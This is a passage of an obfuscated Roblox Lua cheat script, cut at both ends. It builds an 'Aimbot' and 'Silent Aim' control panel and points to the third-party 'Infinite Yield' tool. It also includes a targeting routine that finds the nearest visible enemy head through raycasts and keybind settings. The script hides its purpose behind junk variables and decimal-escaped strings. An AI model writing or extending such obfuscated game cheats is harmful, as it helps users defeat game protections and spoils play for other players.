v_PncUcLUjpW.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_PncUcLUjpW.BackgroundTransparency = 1.000
local v_ZqrVIb = 235;
v_PncUcLUjpW.BorderColor3 = Color3.fromRGB(0, 0, 0)
local v_bMaOWC = 408;
v_PncUcLUjpW.BorderSizePixel = 0
v_PncUcLUjpW.Position = UDim2.new(0.185000002, 0, 0.174999997, 0)
v_PncUcLUjpW.Size = UDim2.new(0, 342, 0, 50)
v_PncUcLUjpW.Font = Enum.Font.SourceSansBold
v_PncUcLUjpW.Text = "\65\105\109\98\111\116\58"
v_PncUcLUjpW.TextColor3 = Color3.fromRGB(0, 0, 0)
v_PncUcLUjpW.TextSize = 40.000
v_PncUcLUjpW.TextXAlignment = Enum.TextXAlignment.Left
local v_kGwAAq = 806;
if v_kGwAAq > 321 then v_kGwAAq = v_kGwAAq + 1 end;

v_PRyanheFHH.Name = "\83\105\108\101\110\116\32\65\105\109"
v_PRyanheFHH.Parent = v_RZcpZDcQFJ
local v_JaYgTA = 934;
v_PRyanheFHH.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_PRyanheFHH.BackgroundTransparency = 1.000
v_PRyanheFHH.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_PRyanheFHH.BorderSizePixel = 0
local v_nZoqjG = 902;
if v_nZoqjG > 400 then v_nZoqjG = v_nZoqjG + 1 end;
v_PRyanheFHH.Position = UDim2.new(0.185000002, 0, 0.625, 0)
local v_gPgFXL = 132;
v_PRyanheFHH.Size = UDim2.new(0, 342, 0, 50)
local v_lzkwNQ = 419;
if v_lzkwNQ > 273 then v_lzkwNQ = v_lzkwNQ + 1 end;
v_PRyanheFHH.Font = Enum.Font.SourceSansBold
local v_Yonwjc = 357;
v_PRyanheFHH.Text = "\73\110\102\105\46\32\89\105\101\108\100\58\32\40\110\111\116\32\109\105\110\101\41"
v_PRyanheFHH.TextColor3 = Color3.fromRGB(0, 0, 0)
v_PRyanheFHH.TextSize = 40.000
v_PRyanheFHH.TextXAlignment = Enum.TextXAlignment.Left

local v_zCZNDl = 132;
if v_zCZNDl > 37 then v_zCZNDl = v_zCZNDl + 1 end;
v_YNscUUyaWI.Name = "\73\110\102\105\110\105\116\101\32\89\105\101\108\100"
local v_vnJoqn = 465;
if v_vnJoqn > 196 then v_vnJoqn = v_vnJoqn + 1 end;
v_YNscUUyaWI.Parent = v_RZcpZDcQFJ
v_YNscUUyaWI.BackgroundColor3 = Color3.fromRGB(39, 59, 39)
local v_zbAwjw = 723;
if v_zbAwjw > 127 then v_zbAwjw = v_zbAwjw + 1 end;
v_YNscUUyaWI.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_YNscUUyaWI.BorderSizePixel = 0
v_YNscUUyaWI.Position = UDim2.new(0.709999979, 0, 0.649999976, 0)
v_YNscUUyaWI.Size = UDim2.new(0, 130, 0, 30)
local v_oGWCQx = 18;

v_bCEPLofkYY.Name = "\73\110\102\105\110\105\116\101\32\89\105\101\108\100"
v_bCEPLofkYY.Parent = v_YNscUUyaWI
local v_EwlshV = 212;
if v_EwlshV > 300 then v_EwlshV = v_EwlshV + 1 end;
v_bCEPLofkYY.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_bCEPLofkYY.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_bCEPLofkYY.BorderSizePixel = 0
v_bCEPLofkYY.Position = UDim2.new(0.0154999997, 0, 0.0670000017, 0)
v_bCEPLofkYY.Size = UDim2.new(0, 125, 0, 25)

v_EktHFSKVlX.Name = "\65\105\109\98\111\116\32\67\105\114\99\108\101\32\79\78\47\79\70\70"
local v_JVucpT = 281;
if v_JVucpT > 134 then v_JVucpT = v_JVucpT + 1 end;
v_EktHFSKVlX.Parent = v_bCEPLofkYY
v_EktHFSKVlX.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_EktHFSKVlX.BackgroundTransparency = 1.000
v_EktHFSKVlX.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_EktHFSKVlX.BorderSizePixel = 0
local v_Pznyka = 965;
v_EktHFSKVlX.Position = UDim2.new(0, 0, -0.0399987809, 0)
v_EktHFSKVlX.Size = UDim2.new(0, 125, 0, 25)
local v_osDAEV = 704;
v_EktHFSKVlX.Font = Enum.Font.SourceSans
v_EktHFSKVlX.Text = ""
v_EktHFSKVlX.TextColor3 = Color3.fromRGB(0, 0, 0)
v_EktHFSKVlX.TextSize = 14.000

v_jjgqqKfzCI.Parent = v_bCEPLofkYY

local v_QlaTVe = 253;
if v_QlaTVe > 263 then v_QlaTVe = v_QlaTVe + 1 end;
v_oDMZiqrauK.Parent = v_YNscUUyaWI



local function v_uOvrPsHeWX() 
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_ghmquACSZq)

 local v_FPgxcQATwb = game:GetService("\85\115\101\114\73\110\112\117\116\83\101\114\118\105\99\101")
 
 local v_drnPtGQNyq = script.Parent
 
local v_gVAAex = 697;
 local v_ZJhZOnVxSA
 local v_EGcOOPrmaO
 local v_JIkMhBeGSu
 local v_flZtKLiKyA
 
local v_jjIMiD = 829;
if v_jjIMiD > 447 then v_jjIMiD = v_jjIMiD + 1 end;
 local function v_UvOSFnZBCq(input)
 local v_IYcpJidxKa = input.Position - v_JIkMhBeGSu
 v_drnPtGQNyq.Position = UDim2.new(v_flZtKLiKyA.X.Scale, v_flZtKLiKyA.X.Offset + v_IYcpJidxKa.X, v_flZtKLiKyA.Y.Scale, v_flZtKLiKyA.Y.Offset + v_IYcpJidxKa.Y)
 end
 
 v_drnPtGQNyq.InputBegan:Connect(function(input)
 if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
 v_ZJhZOnVxSA = (1 == 1)
 v_JIkMhBeGSu = input.Position
local v_FUwfvD = 754;
 v_flZtKLiKyA = v_drnPtGQNyq.Position
 
 input.Changed:Connect(function()
 if input.UserInputState == Enum.UserInputState.End then
 v_ZJhZOnVxSA = (1 == 2)
 end
local v_SEQxOg = 711;
if v_SEQxOg > 379 then v_SEQxOg = v_SEQxOg + 1 end;
 end)
 end
 end)
 
local v_lkClrA = 797;
if v_lkClrA > 125 then v_lkClrA = v_lkClrA + 1 end;
 v_drnPtGQNyq.InputChanged:Connect(function(input)
local v_DTmQQz = 879;
 if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
local v_HzRnbn = 720;
 v_EGcOOPrmaO = input
 end
 end)
 
 v_FPgxcQATwb.InputChanged:Connect(function(input)
 if input == v_EGcOOPrmaO and v_ZJhZOnVxSA then
 v_UvOSFnZBCq(input)
 end
 end)
end
local v_cCTrkV = 318;
coroutine.wrap(v_uOvrPsHeWX)()
local v_qyMFJp = 868;
if v_qyMFJp > 273 then v_qyMFJp = v_qyMFJp + 1 end;
local function v_JSPQfSUzlL() 
local v_UVQytE = 715;
if v_UVQytE > 87 then v_UVQytE = v_UVQytE + 1 end;
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_gLPSuusRXM)

 local v_AkBgEWMiwb = script.Parent
 local v_IBWVJnWKeh = v_AkBgEWMiwb:FindFirstAncestorOfClass("\83\99\114\101\101\110\71\117\105")
 local v_XcRlOMGDfl = v_IBWVJnWKeh:WaitForChild("\77\97\105\110\66\111\114\100\101\114\32\71\85\73")
local v_yHFObD = 872;
 
 local v_eZtjjrUWPN = (1 == 1)
local v_NsoqUZ = 855;
if v_NsoqUZ > 104 then v_NsoqUZ = v_NsoqUZ + 1 end;
 local v_xucYAkAmUL = v_XcRlOMGDfl.Position
local v_nmBnBQ = 895;
if v_nmBnBQ > 11 then v_nmBnBQ = v_nmBnBQ + 1 end;
 local v_wIcTfRhaST = (1 == 2) 
 
local v_EHccxr = 799;
if v_EHccxr > 7 then v_EHccxr = v_EHccxr + 1 end;
 v_AkBgEWMiwb.MouseButton1Click:Connect(function()
local v_GVzhSR = 377;
if v_GVzhSR > 39 then v_GVzhSR = v_GVzhSR + 1 end;
 if v_wIcTfRhaST then return end
 v_wIcTfRhaST = (1 == 1)
 
 v_eZtjjrUWPN = not v_eZtjjrUWPN
local v_gnFVav = 103;
if v_gnFVav > 234 then v_gnFVav = v_gnFVav + 1 end;
 
local v_yhfUAO = 19;
if v_yhfUAO > 103 then v_yhfUAO = v_yhfUAO + 1 end;
 if v_eZtjjrUWPN then
local v_KoFfIU = 103;
 v_XcRlOMGDfl.Position = v_xucYAkAmUL
 else
 if v_XcRlOMGDfl.Position.X.Offset > -1000 then
 v_xucYAkAmUL = v_XcRlOMGDfl.Position
 end
 v_XcRlOMGDfl.Position = UDim2.new(0, -2000, 0, -2000)
 end
 
 task.wait(0.1) 
 v_wIcTfRhaST = (1 == 2)
 end)
local v_ibOuPc = 557;
if v_ibOuPc > 193 then v_ibOuPc = v_ibOuPc + 1 end;
end
coroutine.wrap(v_JSPQfSUzlL)()
local function v_gHGwrLojEL() 
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_vrJhMZPrIv)
local v_snLhoG = 585;

 local v_FPgxcQATwb = game:GetService("\85\115\101\114\73\110\112\117\116\83\101\114\118\105\99\101")
local v_ZEDgju = 101;
if v_ZEDgju > 6 then v_ZEDgju = v_ZEDgju + 1 end;
 
 local v_drnPtGQNyq = script.Parent
 
 local v_ZJhZOnVxSA
local v_bfKGlP = 376;
if v_bfKGlP > 113 then v_bfKGlP = v_bfKGlP + 1 end;
 local v_EGcOOPrmaO
local v_NlWoJQ = 59;
 local v_JIkMhBeGSu
local v_zXvSxf = 79;
if v_zXvSxf > 228 then v_zXvSxf = v_zXvSxf + 1 end;
 local v_flZtKLiKyA
 
 local function v_UvOSFnZBCq(input)
local v_HulbOj = 628;
 local v_IYcpJidxKa = input.Position - v_JIkMhBeGSu
local v_wTmKQd = 169;
if v_wTmKQd > 268 then v_wTmKQd = v_wTmKQd + 1 end;
 v_drnPtGQNyq.Position = UDim2.new(v_flZtKLiKyA.X.Scale, v_flZtKLiKyA.X.Offset + v_IYcpJidxKa.X, v_flZtKLiKyA.Y.Scale, v_flZtKLiKyA.Y.Offset + v_IYcpJidxKa.Y)
 end
 
local v_INmZoW = 974;
if v_INmZoW > 37 then v_INmZoW = v_INmZoW + 1 end;
 v_drnPtGQNyq.InputBegan:Connect(function(input)
local v_nLVHRP = 337;
 if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
 v_ZJhZOnVxSA = (1 == 1)
 v_JIkMhBeGSu = input.Position
 v_flZtKLiKyA = v_drnPtGQNyq.Position
local v_GgPiWi = 666;
if v_GgPiWi > 247 then v_GgPiWi = v_GgPiWi + 1 end;
 
local v_ZhsTdB = 418;
if v_ZhsTdB > 165 then v_ZhsTdB = v_ZhsTdB + 1 end;
 input.Changed:Connect(function()
 if input.UserInputState == Enum.UserInputState.End then
 v_ZJhZOnVxSA = (1 == 2)
local v_aRbvBD = 672;
if v_aRbvBD > 181 then v_aRbvBD = v_aRbvBD + 1 end;
 end
 end)
 end
 end)
 
 v_drnPtGQNyq.InputChanged:Connect(function(input)
local v_FgoMAG = 151;
if v_FgoMAG > 127 then v_FgoMAG = v_FgoMAG + 1 end;
 if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
 v_EGcOOPrmaO = input
local v_PTVOZT = 611;
if v_PTVOZT > 201 then v_PTVOZT = v_PTVOZT + 1 end;
 end
 end)
 
local v_qLowLb = 856;
if v_qLowLb > 461 then v_qLowLb = v_qLowLb + 1 end;
 v_FPgxcQATwb.InputChanged:Connect(function(input)
local v_SGuBeI = 339;
 if input == v_EGcOOPrmaO and v_ZJhZOnVxSA then
 v_UvOSFnZBCq(input)
 end
local v_IElSrT = 635;
if v_IElSrT > 12 then v_IElSrT = v_IElSrT + 1 end;
 end)
end
local v_sSQgkq = 492;
coroutine.wrap(v_gHGwrLojEL)()
local function v_HjyDPYHaeD() 
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_KQOwKWwQAO)

 local v_lrOnXbkbBy = game:GetService("\84\119\101\101\110\83\101\114\118\105\99\101")
 
 local v_AkBgEWMiwb = script.Parent
 local v_RGgGtYTflA = v_AkBgEWMiwb.Parent 
local v_fbkRUv = 652;
 
local v_vDyQgj = 486;
if v_vDyQgj > 295 then v_vDyQgj = v_vDyQgj + 1 end;
 local v_nLmSpvoWnE = (1 == 2)
 
 local v_kWAQSfunCx = Color3.fromRGB(0, 255, 127) 
 local v_xUIPKCFKWm = Color3.fromRGB(255, 50, 50) 
 
 local v_XrFKMWYfPp = TweenInfo.new(0.3, Enum.EasingStyle.Quart, Enum.EasingDirection.Out)
 
local v_szykym = 709;
if v_szykym > 301 then v_szykym = v_szykym + 1 end;
 v_AkBgEWMiwb.Font = Enum.Font.SourceSansBold 
 v_AkBgEWMiwb.Text = "\79\70\70"
 v_RGgGtYTflA.BackgroundColor3 = v_xUIPKCFKWm
 
 v_AkBgEWMiwb.MouseButton1Click:Connect(function()
local v_eSANEn = 511;
 v_nLmSpvoWnE = not v_nLmSpvoWnE
 
local v_zHLIID = 883;
 if v_nLmSpvoWnE then
 local v_lcTtCWREbS = v_lrOnXbkbBy:Create(v_RGgGtYTflA, v_XrFKMWYfPp, {BackgroundColor3 = v_kWAQSfunCx})
 v_lcTtCWREbS:Play()
local v_jTFyrp = 872;
 v_AkBgEWMiwb.Text = "\79\78"
 else
 local v_lcTtCWREbS = v_lrOnXbkbBy:Create(v_RGgGtYTflA, v_XrFKMWYfPp, {BackgroundColor3 = v_xUIPKCFKWm})
 v_lcTtCWREbS:Play()
 v_AkBgEWMiwb.Text = "\79\70\70"
local v_UtBJjR = 625;
 end
 end)
end
local v_wHcnuA = 977;
coroutine.wrap(v_HjyDPYHaeD)()
local v_FCqYUs = 181;
local function v_KVCjYvmmUq() 
 local script = Instance.new("\76\111\99\97\108\83\99\114\105\112\116", v_KQOwKWwQAO)

 local v_NrnamCPpMF = game:GetService("\82\117\110\83\101\114\118\105\99\101")
local v_rHLlsR = 257;
if v_rHLlsR > 445 then v_rHLlsR = v_rHLlsR + 1 end;
 local v_FPgxcQATwb = game:GetService("\85\115\101\114\73\110\112\117\116\83\101\114\118\105\99\101")
local v_CxAisg = 977;
if v_CxAisg > 74 then v_CxAisg = v_CxAisg + 1 end;
 local v_hejSMBEVJo = game:GetService("\80\108\97\121\101\114\115")
 local v_uZXiWdojtQ = workspace.CurrentCamera
 
 local v_UYrCUJiGua = (1 == 2)
 local v_dpNwnTAMhN = (1 == 2)
 local v_CnkKBWjZhu = 1 
 local v_dFAnSHIXJt = Enum.KeyCode.C
local v_EoHLuT = 600;
 local v_cVbVimUDwJ = "\72\79\76\68" 
 local v_HrrcumkFbq = "\72\101\97\100"
 local v_FVRhhktucf = Enum.KeyCode.B 
 
local v_IhJpHm = 552;
 local v_xucYAkAmUL = UDim2.new(0.5, 0, 0.5, 0)
 local v_JXgLftHZYs = (1 == 2)
 local v_wIcTfRhaST = (1 == 2)
 
local v_bHTgey = 157;
 local v_IBWVJnWKeh = script:FindFirstAncestorOfClass("\83\99\114\101\101\110\71\117\105")
 local v_BmfsAdsvRx = Instance.new("\70\114\97\109\101", v_IBWVJnWKeh)
local v_fYkkyY = 858;
if v_fYkkyY > 28 then v_fYkkyY = v_fYkkyY + 1 end;
 v_BmfsAdsvRx.Name = "\65\105\109\98\111\116\83\101\116\116\105\110\103\115"
local v_lYVqtR = 715;
 v_BmfsAdsvRx.Size = UDim2.new(0, 220, 0, 420) 
local v_ZKZbpD = 80;
 v_BmfsAdsvRx.Position = UDim2.new(0, 3000, 0, -1000) 
local v_GvGDjL = 732;
 v_BmfsAdsvRx.AnchorPoint = Vector2.new(0.5, 0.5)
local v_GuZXJE = 681;
if v_GuZXJE > 107 then v_GuZXJE = v_GuZXJE + 1 end;
 v_BmfsAdsvRx.BackgroundColor3 = Color3.fromRGB(20, 42, 17) 
 v_BmfsAdsvRx.BorderSizePixel = 0
 v_BmfsAdsvRx.Visible = (1 == 1) 
 Instance.new("\85\73\67\111\114\110\101\114", v_BmfsAdsvRx).CornerRadius = UDim.new(0, 15)
 
local v_ruSWWa = 82;
if v_ruSWWa > 154 then v_ruSWWa = v_ruSWWa + 1 end;
 local function v_oqBjKCLFwR()
 if v_wIcTfRhaST then return end
 v_wIcTfRhaST = (1 == 1)
 
 v_JXgLftHZYs = not v_JXgLftHZYs
 
 if v_JXgLftHZYs then
 v_BmfsAdsvRx.Position = v_xucYAkAmUL
 else
 
local v_olNTHi = 636;
 if v_BmfsAdsvRx.Position.X.Offset < 2000 then
 v_xucYAkAmUL = v_BmfsAdsvRx.Position
local v_oRuiQQ = 664;
if v_oRuiQQ > 312 then v_oRuiQQ = v_oRuiQQ + 1 end;
 end
 v_BmfsAdsvRx.Position = UDim2.new(0, 3000, 0, -1000)
 end
 
local v_hgcimm = 392;
 task.wait(0.1)
 v_wIcTfRhaST = (1 == 2)
 end
local v_DMSIcD = 546;
 
 local v_sOMBLxKnHg, v_JIkMhBeGSu, v_flZtKLiKyA
 v_BmfsAdsvRx.InputBegan:Connect(function(input)
 if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then
local v_oKmjvt = 525;
if v_oKmjvt > 320 then v_oKmjvt = v_oKmjvt + 1 end;
 v_sOMBLxKnHg = (1 == 1)
 v_JIkMhBeGSu = input.Position
 v_flZtKLiKyA = v_BmfsAdsvRx.Position
 input.Changed:Connect(function()
local v_mxrDNC = 372;
if v_mxrDNC > 6 then v_mxrDNC = v_mxrDNC + 1 end;
 if input.UserInputState == Enum.UserInputState.End then v_sOMBLxKnHg = (1 == 2) end
 end)
local v_WZXkUu = 469;
if v_WZXkUu > 354 then v_WZXkUu = v_WZXkUu + 1 end;
 end
 end)
 v_FPgxcQATwb.InputChanged:Connect(function(input)
 if v_sOMBLxKnHg and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
 local v_IYcpJidxKa = input.Position - v_JIkMhBeGSu
local v_gUTpxz = 16;
if v_gUTpxz > 5 then v_gUTpxz = v_gUTpxz + 1 end;
 v_BmfsAdsvRx.Position = UDim2.new(v_flZtKLiKyA.X.Scale, v_flZtKLiKyA.X.Offset + v_IYcpJidxKa.X, v_flZtKLiKyA.Y.Scale, v_flZtKLiKyA.Y.Offset + v_IYcpJidxKa.Y)
local v_AIfGEY = 463;
 v_xucYAkAmUL = v_BmfsAdsvRx.Position
 end
local v_KZREgR = 539;
 end)
local v_QGXHFV = 257;
if v_QGXHFV > 222 then v_QGXHFV = v_QGXHFV + 1 end;
 
 local v_NIJyfRESKo = Instance.new("\84\101\120\116\76\97\98\101\108", v_BmfsAdsvRx)
 v_NIJyfRESKo.Text = "\83\101\116\116\105\110\103\115"
 v_NIJyfRESKo.Size = UDim2.new(1, 0, 0, 40)
 v_NIJyfRESKo.BackgroundTransparency = 1
local v_JhZpwP = 527;
if v_JhZpwP > 376 then v_JhZpwP = v_JhZpwP + 1 end;
 v_NIJyfRESKo.TextColor3 = Color3.new(1, 1, 1)
 v_NIJyfRESKo.Font = Enum.Font.GothamBold
 v_NIJyfRESKo.TextSize = 16
 local function v_qBBuxdCXvj(v_sBskZWKuqL)
 local v_GfbDmehAVH = v_hejSMBEVJo.LocalPlayer.Character
 if not v_GfbDmehAVH then return (1 == 2) end
local v_dCoQwo = 460;
 local v_kaxXtyyxfQ = RaycastParams.new()
local v_LLBFFO = 7;
 v_kaxXtyyxfQ.FilterDescendantsInstances = {v_GfbDmehAVH, v_uZXiWdojtQ}
 v_kaxXtyyxfQ.FilterType = Enum.RaycastFilterType.Exclude
local v_hutRtp = 946;
 local v_oMrmMdIIbL = v_uZXiWdojtQ.CFrame.Position
 local v_hhRoGwhMdt = v_sBskZWKuqL.Position - v_oMrmMdIIbL
 local v_JTVUznLhbZ = workspace:Raycast(v_oMrmMdIIbL, v_hhRoGwhMdt, v_kaxXtyyxfQ)
 if v_JTVUznLhbZ then
 return v_JTVUznLhbZ.Instance:IsDescendantOf(v_sBskZWKuqL.Parent)
 end
 return (1 == 2)
 end
 
 local function v_phjayfliSg()
 local v_fEPkYAAjaF = nil
 local v_jGfAFqwnSZ = math.huge
 local v_OeoIBurvXz = Vector2.new(v_uZXiWdojtQ.ViewportSize.X / 2, v_uZXiWdojtQ.ViewportSize.Y / 2)
local v_SkQpyI = 821;
 for _, p in pairs(v_hejSMBEVJo:GetPlayers()) do
 if p ~= v_hejSMBEVJo.LocalPlayer and p.Character and p.Team ~= v_hejSMBEVJo.LocalPlayer.Team then
local v_FTkCiR = 616;
 local v_HrifDZMTLa = p.Character:FindFirstChild("\72\117\109\97\110\111\105\100")
 if v_HrifDZMTLa and v_HrifDZMTLa.Health > 0 then
 local v_sBskZWKuqL = p.Character:FindFirstChild(v_HrrcumkFbq)
local v_RwESpk = 414;
if v_RwESpk > 305 then v_RwESpk = v_RwESpk + 1 end;
 if not v_sBskZWKuqL then
 v_sBskZWKuqL = p.Character:FindFirstChild("\72\101\97\100") or p.Character:FindFirstChild("\72\117\109\97\110\111\105\100\82\111\111\116\80\97\114\116")
 end
local v_aiMfJK = 363;
 if v_sBskZWKuqL then
 local v_QiUPaNOjJo, on = v_uZXiWdojtQ:WorldToViewportPoint(v_sBskZWKuqL.Position)
 if on and v_qBBuxdCXvj(v_sBskZWKuqL) then
 local v_MxXMstgJel = (Vector2.new(v_QiUPaNOjJo.X, v_QiUPaNOjJo.Y) - v_OeoIBurvXz).Magnitude
 if v_MxXMstgJel < v_jGfAFqwnSZ then 
 v_fEPkYAAjaF = v_sBskZWKuqL 
 v_jGfAFqwnSZ = v_MxXMstgJel 
 end
local v_ltqQyk = 28;
if v_ltqQyk > 22 then v_ltqQyk = v_ltqQyk + 1 end;
 end
local v_fIcnpM = 476;
if v_fIcnpM > 90 then v_fIcnpM = v_fIcnpM + 1 end;
 end
 end
 end
 end
 return v_fEPkYAAjaF
local v_NrWSGH = 434;
if v_NrWSGH > 351 then v_NrWSGH = v_NrWSGH + 1 end;
 end
 
 local function v_uvXHJJOyoL(labelText, defaultKey, v_QiUPaNOjJo, callback)
 local v_VwQEHnWJIk = Instance.new("\84\101\120\116\76\97\98\101\108", v_BmfsAdsvRx)
local v_LMgtDM = 270;
if v_LMgtDM > 6 then v_LMgtDM = v_LMgtDM + 1 end;
 v_VwQEHnWJIk.Text = labelText
 v_VwQEHnWJIk.Size = UDim2.new(0.8, 0, 0, 20)
local v_vhoHDP = 671;
if v_vhoHDP > 34 then v_vhoHDP = v_vhoHDP + 1 end;
 v_VwQEHnWJIk.Position = UDim2.new(0.1, 0, v_QiUPaNOjJo.Y.Scale - 0.05, 0)
 v_VwQEHnWJIk.BackgroundTransparency = 1
 v_VwQEHnWJIk.TextColor3 = Color3.fromRGB(200, 200, 200)
local v_PYaszt = 819;
 v_VwQEHnWJIk.Font = Enum.Font.GothamSemibold
 v_VwQEHnWJIk.TextSize = 10
 v_VwQEHnWJIk.TextXAlignment = Enum.TextXAlignment.Left
 local v_AkBgEWMiwb = Instance.new("\84\101\120\116\66\111\120", v_BmfsAdsvRx)
 v_AkBgEWMiwb.Text = defaultKey.Name
local v_TYLBhi = 268;
if v_TYLBhi > 74 then v_TYLBhi = v_TYLBhi + 1 end;
 v_AkBgEWMiwb.Size = UDim2.new(0.8, 0, 0, 28)
 v_AkBgEWMiwb.Position = v_QiUPaNOjJo
 v_AkBgEWMiwb.BackgroundColor3 = Color3.fromRGB(35, 65, 30)
 v_AkBgEWMiwb.TextColor3 = Color3.new(1, 1, 1)
 v_AkBgEWMiwb.Font = Enum.Font.Gotham
 v_AkBgEWMiwb.TextSize = 12
 Instance.new("\85\73\67\111\114\110\101\114", v_AkBgEWMiwb).CornerRadius = UDim.new(0, 8)
 v_AkBgEWMiwb.FocusLost:Connect(function()
local v_NOPXGN = 560;
if v_NOPXGN > 240 then v_NOPXGN = v_NOPXGN + 1 end;
 local v_VZhAMqNeDM = v_AkBgEWMiwb.Text:upper()
 local v_vGjNpXyThR, result = pcall(function() return Enum.KeyCode[v_VZhAMqNeDM] end)
 if v_vGjNpXyThR and result then
local v_XgIlua = 262;
 v_AkBgEWMiwb.Text = result.Name
 callback(result)
 else
 v_AkBgEWMiwb.Text = "\73\78\86\65\76\73\68"
 task.wait(1)
 v_AkBgEWMiwb.Text = defaultKey.Name
 end
 end)
 return v_AkBgEWMiwb
 end
 local function v_uHseVZzwhM(labelText, options, startIndex, v_QiUPaNOjJo, callback)
local v_fkPBTb = 254;
if v_fkPBTb > 473 then v_fkPBTb = v_fkPBTb + 1 end;
 local v_VwQEHnWJIk = Instance.new("\84\101\120\116\76\97\98\101\108", v_BmfsAdsvRx)
local v_ZLFPDv = 199;
 v_VwQEHnWJIk.Text = labelText
local v_ynaifp = 469;
if v_ynaifp > 374 then v_ynaifp = v_ynaifp + 1 end;
 v_VwQEHnWJIk.Size = UDim2.new(0.8, 0, 0, 20)
 v_VwQEHnWJIk.Position = UDim2.new(0.1, 0, v_QiUPaNOjJo.Y.Scale - 0.05, 0)
 v_VwQEHnWJIk.BackgroundTransparency = 1
local v_mvCRXl = 428;
if v_mvCRXl > 497 then v_mvCRXl = v_mvCRXl + 1 end;
 v_VwQEHnWJIk.TextColor3 = Color3.fromRGB(200, 200, 200)
local v_vfYuCo = 571;
if v_vfYuCo > 18 then v_vfYuCo = v_vfYuCo + 1 end;
 v_VwQEHnWJIk.Font = Enum.Font.GothamSemibold
local v_HUIdQe = 880;
if v_HUIdQe > 375 then v_HUIdQe = v_HUIdQe + 1 end;
 v_VwQEHnWJIk.TextSize = 10
 v_VwQEHnWJIk.TextXAlignment = Enum.TextXAlignment.Left
local v_xNcoqp = 641;
 local v_AkBgEWMiwb = Instance.new("\84\101\120\116\66\117\116\116\111\110", v_BmfsAdsvRx)
 local v_povREFqWnf = startIndex
local v_WKjgxP = 345;
if v_WKjgxP > 42 then v_WKjgxP = v_WKjgxP + 1 end;
 v_AkBgEWMiwb.Text = options[v_povREFqWnf]
 v_AkBgEWMiwb.Size = UDim2.new(0.8, 0, 0, 28)
 v_AkBgEWMiwb.Position = v_QiUPaNOjJo
 v_AkBgEWMiwb.BackgroundColor3 = Color3.fromRGB(35, 65, 30)
local v_Wrwdla = 404;
if v_Wrwdla > 9 then v_Wrwdla = v_Wrwdla + 1 end;
 v_AkBgEWMiwb.TextColor3 = Color3.new(1, 1, 1)
 v_AkBgEWMiwb.Font = Enum.Font.Gotham
 v_AkBgEWMiwb.TextSize = 12
local v_YWZFei = 372;
if v_YWZFei > 437 then v_YWZFei = v_YWZFei + 1 end;
 Instance.new("\85\73\67\111\114\110\101\114", v_AkBgEWMiwb).CornerRadius = UDim.new(0, 8)
local v_nscslv = 698;
 v_AkBgEWMiwb.MouseButton1Click:Connect(function()
local v_EqRIFQ = 647;
if v_EqRIFQ > 142 then v_EqRIFQ = v_EqRIFQ + 1 end;
 v_povREFqWnf = v_povREFqWnf + 1
 if v_povREFqWnf > #options then v_povREFqWnf = 1 end
 v_AkBgEWMiwb.Text = options[v_povREFqWnf]
local v_vdUPgQ = 359;
if v_vdUPgQ > 204 then v_vdUPgQ = v_vdUPgQ + 1 end;
 callback(options[v_povREFqWnf])
 end)
 return v_AkBgEWMiwb
 end
local v_ulRZdD = 870;
if v_ulRZdD > 232 then v_ulRZdD = v_ulRZdD + 1 end;
 local function v_bloIsSFvFr(labelText, defaultText, v_QiUPaNOjJo, callback)
 local v_VwQEHnWJIk = Instance.new("\84\101\120\116\76\97\98\101\108", v_BmfsAdsvRx)
 v_VwQEHnWJIk.Text = labelText
 v_VwQEHnWJIk.Size = UDim2.new(0.8, 0, 0, 20)
 v_VwQEHnWJIk.Position = UDim2.new(0.1, 0, v_QiUPaNOjJo.Y.Scale - 0.05, 0)
 v_VwQEHnWJIk.BackgroundTransparency = 1
 v_VwQEHnWJIk.TextColor3 = Color3.fromRGB(200, 200, 200)
local v_dUtBoF = 666;
if v_dUtBoF > 414 then v_dUtBoF = v_dUtBoF + 1 end;
 v_VwQEHnWJIk.Font = Enum.Font.GothamSemibold
local v_pQtiIF = 116;
if v_pQtiIF > 187 then v_pQtiIF = v_pQtiIF + 1 end;
 v_VwQEHnWJIk.TextSize = 10
 v_VwQEHnWJIk.TextXAlignment = Enum.TextXAlignment.Left
 local v_dQqZwUiLPB = Instance.new("\84\101\120\116\66\111\120", v_BmfsAdsvRx)
 v_dQqZwUiLPB.Text = defaultText
local v_VZyxLb = 706;
if v_VZyxLb > 172 then v_VZyxLb = v_VZyxLb + 1 end;
 v_dQqZwUiLPB.Size = UDim2.new(0.8, 0, 0, 28)
 v_dQqZwUiLPB.Position = v_QiUPaNOjJo
 v_dQqZwUiLPB.BackgroundColor3 = Color3.fromRGB(35, 65, 30)
local v_vFHzOn = 855;
 v_dQqZwUiLPB.TextColor3 = Color3.new(1, 1, 1)
 v_dQqZwUiLPB.Font = Enum.Font.Gotham
 v_dQqZwUiLPB.TextSize = 12
 Instance.new("\85\73\67\111\114\110\101\114", v_dQqZwUiLPB).CornerRadius = UDim.new(0, 8)
 v_dQqZwUiLPB.FocusLost:Connect(function()
 callback(v_dQqZwUiLPB.Text)
 end)
 return v_dQqZwUiLPB
local v_QgZeXK = 140;
 end
 local v_kGvULLiDbM = v_FPgxcQATwb.TouchEnabled 
 local v_JKjrkXPvWD = Instance.new("\84\101\120\116\66\117\116\116\111\110", v_IBWVJnWKeh)
 v_JKjrkXPvWD.Name = "\77\111\98\105\108\101\65\105\109\66\117\116\116\111\110"
 v_JKjrkXPvWD.Size = UDim2.new(0, 60, 0, 60)
